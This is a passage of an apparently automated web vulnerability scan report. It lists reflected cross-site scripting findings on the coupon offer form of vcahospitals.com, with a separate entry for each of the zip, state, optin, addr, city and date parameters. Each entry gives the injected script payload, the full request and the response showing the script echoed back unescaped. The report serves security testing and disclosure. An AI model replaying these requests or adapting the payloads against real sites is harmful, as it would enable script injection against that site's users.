http%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2
525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=83dad"><script>alert(1)</script>b2542e55643&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:39 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ohcttmqldd2o8ov91qf8l0ptp6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
IE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=83dad"><script>alert(1)</script>b2542e55643&zip=" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.52. http://www.vcahospitals.com/main/offer [zip parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the zip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 835b4"><script>alert(1)</script>e5f0d47fe97 was submitted in the zip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2
525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=835b4"><script>alert(1)</script>e5f0d47fe97 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:46 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=9duq7ra7irdi2bi4ngj9f38dk7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=835b4"><script>alert(1)</script>e5f0d47fe97" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.53. http://www.vcahospitals.com/main/offer/ [ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a4ae"><script>alert(1)</script>6cab6f57fc7 was submitted in the parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?=37a4ae"><script>alert(1)</script>6cab6f57fc7&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:53 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?=37a4ae"><script>alert(1)</script>6cab6f57fc7&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F" method="POST" name="offer-form" id="offer-form" class="input-fo
...[SNIP]...

2.54. http://www.vcahospitals.com/main/offer/ [&optin parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the &optin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80fb4"><script>alert(1)</script>58eba80557c was submitted in the &optin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?&optin=180fb4"><script>alert(1)</script>58eba80557c&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:06 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?&optin=180fb4"><script>alert(1)</script>58eba80557c&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.55. http://www.vcahospitals.com/main/offer/ [&state parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the &state request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fc88"><script>alert(1)</script>a3145493564 was submitted in the &state parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?&state=FL3fc88"><script>alert(1)</script>a3145493564&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:15:59 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?&state=FL3fc88"><script>alert(1)</script>a3145493564&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.56. http://www.vcahospitals.com/main/offer/ [addr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the addr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a42b0"><script>alert(1)</script>3f63bb4fc1f was submitted in the addr parameter. This input was echoed unmodified in the application's response.

This request, and the ones for the findings that follow, also show that the offer form carries values such as ipaddress, useragent and token as ordinary query parameters, so they are client-controlled, and that its referer and uri parameters contain progressively percent-encoded copies of earlier query strings (%3d, %253d, %25253d): each rendered action URL embeds the request that produced it. Because the whole query string is reflected into the same attribute, the scan reports each field separately (addr, city, date, email, fname, formtype, guid and ipaddress in 2.56 to 2.63).

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=a42b0"><script>alert(1)</script>3f63bb4fc1f&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.
vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:15:55 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=7hsjo72anm75fuu66qlgrcdl51; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=a42b0"><script>alert(1)</script>3f63bb4fc1f&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2f
...[SNIP]...

2.57. http://www.vcahospitals.com/main/offer/ [city parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the city request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a762"><script>alert(1)</script>ca37e104d6b was submitted in the city parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=2a762"><script>alert(1)</script>ca37e104d6b&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.
vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:00 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=fo15h1tlhcbbnb166klq5i4j61; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=2a762"><script>alert(1)</script>ca37e104d6b&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vc
...[SNIP]...

2.58. http://www.vcahospitals.com/main/offer/ [date parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the date request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67b79"><script>alert(1)</script>b01a5b3d5be was submitted in the date parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=130708440067b79"><script>alert(1)</script>b01a5b3d5be&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.
